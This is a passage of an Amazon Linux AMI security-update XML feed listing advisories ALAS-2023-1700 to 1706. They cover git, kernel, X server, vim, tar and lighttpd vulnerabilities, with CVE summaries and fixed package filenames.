version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-perl-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius-postgresql" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-postgresql-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius-unixODBC" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-unixODBC-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius-mysql" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-mysql-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius-ldap" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-ldap-2.2.6-7.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1700</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1700: medium priority package update for git</title><issued date="2023-03-02 20:22:00" /><updated date="2023-03-07 01:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-23946:
Git, a revision control system, is vulnerable to path traversal prior to versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6, 2.31.7, and 2.30.8. By feeding a crafted input to `git apply`, a path outside the working tree can be overwritten as the user who is running `git apply`. A fix has been prepared and will appear in v2.39.2, v2.38.4, v2.37.6, v2.36.5, v2.35.7, v2.34.7, v2.33.7, v2.32.6, v2.31.7, and v2.30.8. As a workaround, use `git apply --stat` to inspect a patch before applying; avoid applying one that creates a symbolic link and then creates a file beyond the symbolic link.
CVE-2023-22490:
Git is a revision control system. Using a specially-crafted repository, Git prior to versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6, 2.31.7, and 2.30.8 can be tricked into using its local clone optimization even when using a non-local transport. Though Git will abort local clones whose source `$GIT_DIR/objects` directory contains symbolic links, the `objects` directory itself may still be a symbolic link. These two may be combined to include arbitrary files based on known paths on the victim's filesystem within the malicious repository's working copy, allowing for data exfiltration in a similar manner as CVE-2022-39253. A fix has been prepared and will appear in v2.39.2 v2.38.4 v2.37.6 v2.36.5 v2.35.7 v2.34.7 v2.33.7 v2.32.6, v2.31.7 and v2.30.8. If upgrading is impractical, two short-term workarounds are available. Avoid cloning repositories from untrusted sources with `--recurse-submodules`. Instead, consider cloning repositories without recursively cloning their submodules, and instead run `git submodule update` at each layer. Before doing so, inspect each new `.gitmodules` file to ensure that it does not contain suspicious module URLs.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22490" title="" id="CVE-2023-22490" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23946" title="" id="CVE-2023-23946" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-daemon" version="2.38.4" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.38.4-1.80.amzn1.x86_64.rpm</filename></package><package name="git-instaweb" version="2.38.4" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-instaweb-2.38.4-1.80.amzn1.x86_64.rpm</filename></package><package name="git-hg" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-core" version="2.38.4" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-core-2.38.4-1.80.amzn1.x86_64.rpm</filename></package><package name="perl-Git-SVN" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-subtree" version="2.38.4" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-subtree-2.38.4-1.80.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.38.4" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.38.4-1.80.amzn1.x86_64.rpm</filename></package><package name="git-bzr" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.38.4" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.38.4-1.80.amzn1.x86_64.rpm</filename></package><package name="git" version="2.38.4" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.38.4-1.80.amzn1.x86_64.rpm</filename></package><package name="git-core-doc" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/git-core-doc-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.38.4" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.38.4-1.80.amzn1.noarch.rpm</filename></package><package name="git-instaweb" version="2.38.4" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/git-instaweb-2.38.4-1.80.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.38.4" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.38.4-1.80.amzn1.i686.rpm</filename></package><package name="git-core" version="2.38.4" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/git-core-2.38.4-1.80.amzn1.i686.rpm</filename></package><package name="git" version="2.38.4" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.38.4-1.80.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.38.4" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.38.4-1.80.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.38.4" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.38.4-1.80.amzn1.i686.rpm</filename></package><package name="git-subtree" version="2.38.4" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/git-subtree-2.38.4-1.80.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1701</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1701: important priority package update for kernel</title><issued date="2023-03-17 15:53:00" /><updated date="2025-04-23 22:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-7192:
kernel: refcount leak in ctnetlink_create_conntrack()
CVE-2023-52974:
In the Linux kernel, the following vulnerability has been resolved:
scsi: iscsi_tcp: Fix UAF during login when accessing the shost ipaddress
CVE-2023-45862:
An issue was discovered in drivers/usb/storage/ene_ub6250.c for the ENE UB6250 reader driver in the Linux kernel before 6.2.5. An object could potentially extend beyond the end of an allocation.
CVE-2023-2985:
A use-after-free flaw was found in hfsplus_put_super in fs/hfsplus/super.c in the Linux Kernel. This flaw could allow a local user to cause a denial of service.
CVE-2023-26545:
In the Linux kernel before 6.1.13, there is a double free in net/mpls/af_mpls.c upon an allocation failure (for registering the sysctl table under a new location) during the renaming of a device.
CVE-2023-2162:
A use-after-free flaw was found in iscsi_sw_tcp_session_create in drivers/scsi/iscsi_tcp.c in the SCSI sub-component in the Linux Kernel. This issue could allow an attacker to leak kernel internal information.
CVE-2023-1998:
When plain IBRS is enabled (not enhanced IBRS), the logic in spectre_v2_user_select_mitigation() determines that STIBP is not needed. The IBRS bit implicitly protects against cross-thread branch target
injection. However, with legacy IBRS, the IBRS bit is cleared on returning to userspace for performance reasons which leaves userspace threads vulnerable to cross-thread branch target injection against which STIBP protects.
CVE-2023-1829:
A use-after-free vulnerability in the Linux Kernel traffic control index filter (tcindex) can be exploited to achieve local privilege escalation. The tcindex_delete function which does not properly deactivate filters in case of a perfect hashes while deleting the underlying structure which can later lead to double freeing the structure. A local attacker user can use this vulnerability to elevate its privileges to root.
We recommend upgrading past commit 8c710f75256bb3cf05ac7b1672c82b92c43f3d28.
CVE-2023-1281:
Use After Free vulnerability in Linux kernel traffic control index filter (tcindex) allows Privilege Escalation. The imperfect hash area can be updated while packets are traversing, which will cause a use-after-free when 'tcf_exts_exec()' is called with the destroyed tcf_ext. A local attacker user can use this vulnerability to elevate its privileges to root.
This issue affects Linux Kernel: from 4.14 before git commit ee059170b1f7e94e55fa6cadee544e176a6e59c2.
CVE-2023-0458:
Detected a few exploitable gadgets that could leak secret memory through a side-channel such as MDS as well as insufficient hardening of the usercopy functions against spectre-v1.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0458" title="" id="CVE-2023-0458" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1281" title="" id="CVE-2023-1281" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1829" title="" id="CVE-2023-1829" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1998" title="" id="CVE-2023-1998" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2162" title="" id="CVE-2023-2162" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26545" title="" id="CVE-2023-26545" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2985" title="" id="CVE-2023-2985" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45862" title="" id="CVE-2023-45862" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52974" title="" id="CVE-2023-52974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7192" title="" id="CVE-2023-7192" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.309" release="159.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.309-159.529.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.309-159.529.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.309" release="159.529.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.309-159.529.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1702</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1702: important priority package update for xorg-x11-server</title><issued date="2023-03-17 15:53:00" /><updated date="2023-03-22 18:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0494:
A vulnerability was found in X.Org. This issue occurs due to a dangling pointer in DeepCopyPointerClasses that can be exploited by ProcXkbSetDeviceInfo() and ProcXkbGetDeviceInfo() to read and write into freed memory. This can lead to local privilege elevation on systems where the X server runs privileged and remote code execution for ssh X forwarding sessions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0494" title="" id="CVE-2023-0494" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.51.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.51.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.51.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.51.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.51.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.51.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.51.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.51.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.51.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.51.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.51.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.51.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.51.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.51.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.51.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.51.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.51.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1703</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1703: important priority package update for vim</title><issued date="2023-03-17 15:53:00" /><updated date="2023-03-22 18:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-1127:
Divide By Zero in GitHub repository vim/vim prior to 9.0.1367.
CVE-2023-0512:
Divide By Zero in GitHub repository vim/vim prior to 9.0.1247.
CVE-2023-0433:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1225.
CVE-2023-0288:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1189.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0288" title="" id="CVE-2023-0288" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0433" title="" id="CVE-2023-0433" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0512" title="" id="CVE-2023-0512" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1127" title="" id="CVE-2023-1127" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-enhanced" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.1367-1.73.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.1367-1.73.amzn1.noarch.rpm</filename></package><package name="vim-filesystem" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.1367-1.73.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.1367-1.73.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.1367-1.73.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.1367-1.73.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.1367-1.73.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.1367-1.73.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.1367-1.73.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.1367" release="1.73.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.1367-1.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1704</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1704: important priority package update for tar</title><issued date="2023-03-17 15:53:00" /><updated date="2023-03-22 18:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48303:
GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303" title="" id="CVE-2022-48303" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tar" version="1.26" release="31.23.amzn1" epoch="2" arch="x86_64"><filename>Packages/tar-1.26-31.23.amzn1.x86_64.rpm</filename></package><package name="tar-debuginfo" version="1.26" release="31.23.amzn1" epoch="2" arch="x86_64"><filename>Packages/tar-debuginfo-1.26-31.23.amzn1.x86_64.rpm</filename></package><package name="tar" version="1.26" release="31.23.amzn1" epoch="2" arch="i686"><filename>Packages/tar-1.26-31.23.amzn1.i686.rpm</filename></package><package name="tar-debuginfo" version="1.26" release="31.23.amzn1" epoch="2" arch="i686"><filename>Packages/tar-debuginfo-1.26-31.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1705</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1705: important priority package update for lighttpd</title><issued date="2023-03-17 15:53:00" /><updated date="2023-03-22 18:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-37797:
In lighttpd 1.4.65, mod_wstunnel does not initialize a handler function pointer if an invalid HTTP request (websocket handshake) is received. It leads to null pointer dereference which crashes the server. It could be used by an external attacker to cause denial of service condition.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37797" title="" id="CVE-2022-37797" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lighttpd-fastcgi" version="1.4.53" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-fastcgi-1.4.53-1.37.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_authn_mysql" version="1.4.53" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_authn_mysql-1.4.53-1.37.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.53" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_geoip-1.4.53-1.37.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_authn_gssapi" version="1.4.53" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_authn_gssapi-1.4.53-1.37.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_authn_pam" version="1.4.53" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_authn_pam-1.4.53-1.37.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.53" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.53-1.37.amzn1.x86_64.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.53" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-debuginfo-1.4.53-1.37.amzn1.x86_64.rpm</filename></package><package name="lighttpd" version="1.4.53" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-1.4.53-1.37.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_authn_gssapi" version="1.4.53" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_authn_gssapi-1.4.53-1.37.amzn1.i686.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.53" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-debuginfo-1.4.53-1.37.amzn1.i686.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.53" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-fastcgi-1.4.53-1.37.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.53" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.53-1.37.amzn1.i686.rpm</filename></package><package name="lighttpd" version="1.4.53" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-1.4.53-1.37.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_authn_mysql" version="1.4.53" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_authn_mysql-1.4.53-1.37.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.53" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_geoip-1.4.53-1.37.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_authn_pam" version="1.4.53" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_authn_pam-1.4.53-1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1706</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1706: important priority package update for kernel</title><issued date="2023-03-17 15:53:00" /><updated date="2025-04-23 22:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-1073:
A memory corruption flaw was found in the Linux kernel's human interface device (HID) subsystem in how a user inserts a malicious USB device. This flaw allows a local user to crash or potentially escalate their privileges on the system.
CVE-2023-0461:
There is a use-after-free vulnerability in the Linux Kernel which can be exploited to achieve local privilege escalation. To reach the vulnerability kernel configuration flag CONFIG_TLS or CONFIG_XFRM_ESPINTCP has to be configured, but the operation does not require any privilege.
There is a use-after-free bug of icsk_ulp_data of a struct inet_connection_sock.
When CONFIG_TLS is enabled, user can install a tls context (struct tls_context) on a connected tcp socket. The context is not cleared if this socket is disconnected and reused as a listener. If a new socket is created from the listener, the context is inherited and vulnerable.
The setsockopt TCP_ULP operation does not require any privilege.
We recommend upgrading past commit 2c02d41d71f90a5168391b6a5f2954112ba2307c
CVE-2023-0459:
Detected a few exploitable gadgets that could leak secret memory through a side-channel such as MDS as well as insufficient hardening of the usercopy functions against spectre-v1.
CVE-2023-0394:
A NULL pointer dereference flaw was found in rawv6_push_pending_frames in net/ipv6/raw.c in the network subcomponent in the Linux kernel. This flaw causes the system to crash.
CVE-2023-0045:
The Linux kernel does not correctly mitigate SMT attacks, as discovered through a strange pattern in the kernel API using STIBP as a mitigation, leaving the process exposed for a short period of time after a syscall. The kernel also does not issue an IBPB immediately during the syscall.
CVE-2022-49753:
In the Linux kernel, the following vulnerability has been resolved:
dmaengine: Fix double increment of client_count in dma_chan_get()
CVE-2022-49015:
In the Linux kernel, the following vulnerability has been resolved:
net: hsr: Fix potential use-after-free
CVE-2022-48991:
In the Linux kernel, the following vulnerability has been resolved:
mm/khugepaged: invoke MMU notifiers in shmem/file collapse paths
CVE-2022-48988:
In the Linux kernel, the following vulnerability has been resolved:
memcg: fix possible use-after-free in memcg_write_event_control()
CVE-2022-48956:
In the Linux kernel, the following vulnerability has been resolved:
ipv6: avoid use-after-free in ip6_fragment()
CVE-2022-42329:
